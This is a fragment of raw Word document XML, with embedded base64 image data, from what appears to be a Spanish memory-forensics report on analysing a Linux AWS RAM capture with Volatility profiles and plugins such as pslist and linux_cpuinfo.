rt8G8YAPM&#10;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DmYUSYAwAAJAgAAA4AAAAAAAAAAAAAAAAAOgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAHFh5acauwAAGrsAABQAAAAAAAAAAAAAAAAA&#10;/gUAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgAAAAhAFIGO5LfAAAABwEAAA8AAAAA&#10;AAAAAAAAAAAASsEAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQCqJg6+vAAAACEBAAAZ&#10;AAAAAAAAAAAAAAAAAFbCAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEA&#10;AEnDAAAAAA==&#10;">
                <v:shape id="Imagen 23" o:spid="_x0000_s1094" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:37172;height:10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xNuzQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bS8NA&#10;EIXfC/0Pywi+tZvaqjF2W2pFEEGhF9DHMTu50OxszK5p/PfOg+DjzJw553zL9eAa1VMXas8GZtME&#10;FHHubc2lgePhaZKCChHZYuOZDPxQgPVqPFpiZv2Zd9TvY6nEhEOGBqoY20zrkFfkMEx9Syy3wncO&#10;o4xdqW2HZzF3jb5KkhvtsGZJqLClbUX5af/tDGxvP95386+ieH3o7ebzjYpHfOmNubwYNvegIg3x&#10;X/z3/Wyl/iK9vpvN04VQCJMsQK9+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABTzE27N&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;">
                  <v:imagedata r:id="rId146" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1095" type="#_x0000_t202" style="position:absolute;left:38558;top:1984;width:15462;height:6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bLzQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PSwMx&#10;FMTvgt8hPMGL2Gz/uG3XpqUUBfVSXHvp7bF53axuXpYk267f3giCx2FmfsOsNoNtxZl8aBwrGI8y&#10;EMSV0w3XCg4fz/cLECEia2wdk4JvCrBZX1+tsNDuwu90LmMtEoRDgQpMjF0hZagMWQwj1xEn7+S8&#10;xZikr6X2eElw28pJluXSYsNpwWBHO0PVV9lbBfvZcW/u+tPT23Y29a+Hfpd/1qVStzfD9hFEpCH+&#10;h//aL1rBw3QyX47nyxx+L6U7INc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACAFlsvN&#10;AAAA4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="78B8D5A8" w14:textId="48684A55" w:rsidR="00300365" w:rsidRPr="00233117" w:rsidRDefault="00300365" w:rsidP="00300365">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>23</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="64" w:name="_Toc155782590"/>
                        <w:r w:rsidRPr="00AB1D87">
                          <w:t>Comprobación de funcionamiento del nuevo perfil.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="64"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E46DC" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adelante, en este caso es solo para prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0A59F" w14:textId="684176B4" w:rsidR="002F18FA" w:rsidRPr="009B1250" w:rsidRDefault="002F18FA" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FD37BC" w14:textId="2EDADAE4" w:rsidR="009B1250" w:rsidRDefault="009A31E7" w:rsidP="009A31E7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc155782511"/>
      <w:r w:rsidRPr="009A31E7">
        <w:t>3.4.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:t>Datos de interés de la captura de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">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instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="43D23BAB" w14:textId="3CC5FC6F" w:rsidR="009B1250" w:rsidRDefault="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A508510" w14:textId="06DABD3F" w:rsidR="009B1250" w:rsidRDefault="009A31E7" w:rsidP="009A31E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A31E7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidR="00FA1220">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el apartado anterior</w:t>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, hemos realizado una guía para crear el perfil de Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS: Acrónimo de Amazon Web Services"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que detectado durante el análisis del sistema operativo.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1220">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez creado el perfil de linuxUbuntu_4.15.0-1021-aws procederemos a hacer un </w:t>
      </w:r>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pslist</w:t>
      </w:r>
      <w:r w:rsidRPr="009A31E7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para listar todas las aplicaciones que estaban ejecutándose en el momento de la captura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D5EF5" w14:textId="6334D634" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:t>Linux_cpuinfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446A624" w14:textId="172F5403" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para comprobar que el perfil funciona, vamos a comenzar a comprobar cuál es el </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CPU (Central Processing Unit): Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que usa el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DE606" w14:textId="28B11258" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="002F18FA" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C197CE2" wp14:editId="268B5904">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>541235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5445813" cy="635000"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="817682680" name="Grupo 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5445813" cy="635000"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5445813" cy="635000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="940645990" name="Imagen 26" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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797935" cy="635000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1075025575" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3838628" y="60385"/>
                            <a:ext cx="1607185" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4AD77F07" w14:textId="48B52B6F" w:rsidR="00300365" w:rsidRPr="004809BD" w:rsidRDefault="00300365" w:rsidP="00300365">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>24</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="66" w:name="_Toc155782591"/>
                              <w:r w:rsidR="001C1ADA">
                                <w:t xml:space="preserve">Comando </w:t>
                              </w:r>
                              <w:r w:rsidRPr="005F2ED8">
                                <w:t>linux_cpuinfo.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197CE2" id="Grupo 13" o:spid="_x0000_s1096" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:42.6pt;width:428.8pt;height:50pt;z-index:251748352;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="54458,6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K59KmQMAACAIAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtuGzcQfS+QfyBY&#10;oG/xri6rWywHilwbBoxEqF3kmeJytUR2SZakLu7f9Bv6CfmxHnJ35YvSxs2DVsPbzOGZM8Pz94e6&#10;IjthndRqTntnKSVCcZ1LtZnT3++v3k4ocZ6pnFVaiTl9EI6+v3jz0/nezERfl7rKhSVwotxsb+a0&#10;9N7MksTxUtTMnWkjFBYLbWvmMbSbJLdsD+91lfTTdJTstc2N1Vw4h9nLZpFeRP9FIbj/VBROeFLN&#10;KbD5+LXxuw7f5OKczTaWmVLyFgb7ARQ1kwpBj64umWdka+WJq1pyq50u/BnXdaKLQnIR74Db9NIX&#10;t7m2emviXTaz/cYcaQK1L3j6Ybf84+7amjuzsmBibzbgIo7CXQ6FrcM/UJJDpOzhSJk4eMIxmQ2H&#10;2aQ3oIRjbTTI0rTllJcg/uQYL3/974NJFzZ5BsZIPsOvZQDWCQPfVwpO+a0VtHVSv8pHzeyXrXmL&#10;ZBnm5VpW0j9E4SEtAZTarSRf2WYAMleWyHxOp8N0NMymU0hOsRq6v6nZRijSH1GSC8ehwHtQqH/5&#10;+bB4Fz+XYVYaLr/+rQi2CstyRtjW6/rrX15yeFFeBL2GsCFSE5cFXm41/+KI0suSqY1YOAPdoxrD&#10;7uT59jh8BnpdSXMlqypkOtgtPUD4QmPfYLjR76Xm24CuKUgrKjCllSulcZTYmajXApTYmzwCYjPn&#10;rfC8DAELBP4NYAPQJwsR5SOwcAUHib5WlIPxdDwdZC9FedQWOLPOXwtdk2AAGyAgoWzGdreuBdNt&#10;aSls4kdggBNqBQ3LdWxhdMLX/6rJu5IZAQjB7aOMeuk4S/tZNsZdGh0ttyy3GhoiPuiHRErbQ6GK&#10;iT980KjL4/y/8DaYDCajPppzKNt0MMmaTtiVdW+UjnuYjGU97GV9KLnJUdcUOnpexSBSqyuZdzIL&#10;Z5eVJTuGrrwvZaPrIICnuyoVMqJ0ONXEDjPoC64VQ7D8YX2IFdfvB4Bhaq3zBxBhNRKL+nOGX0kE&#10;vGXOr5hFd8ckXiz/CZ+i0vs51a1FSantn9+aD/uRYKxSssdrMafujy0LzaS6UUh9eFo6w3bGujPU&#10;tl5qXLUX0UQTB6yvOrOwuv6Mh2wRomCJKY5Yc+o7c+kxwgIeQi4Wi2g3PelW3R